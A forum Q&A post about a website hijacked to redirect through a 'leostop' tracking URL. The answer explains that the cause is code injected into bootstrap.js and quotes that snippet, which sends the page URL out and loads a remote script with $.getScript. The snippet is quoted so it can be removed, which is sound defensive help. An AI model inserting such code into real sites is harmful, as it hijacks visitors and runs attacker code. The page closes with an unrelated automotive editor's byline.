My Web Site Redirect Http: //Leostop. Com/Tracking/Tracking. Php? Full_Url=Http//Mywebsite [Closed]

my website redirects itself to this site : . Why does this happen and how do i solve this situation? Thanks...

3

Search for the phrase "leostop" in your project source code and remove the code related to it.

I too encountered the same problem, for me, the code to redirect is written in bootstrap.js file.

var protocol = location.protocol;
$.ajax({ type: "get", data: { surl: getURL() }, success: function (response) { $.getScript(protocol + "//"); } });

I removed this above code and it solved the problem for me.

I hope it helps.

2
Robert Thorne

Robert Thorne

Automotive & Future Transportation Editor

Robert Thorne covers electric vehicle innovations, autonomous driving systems, global mobility trends, and automotive engineering developments.

Share this article
Twitter Facebook Pinterest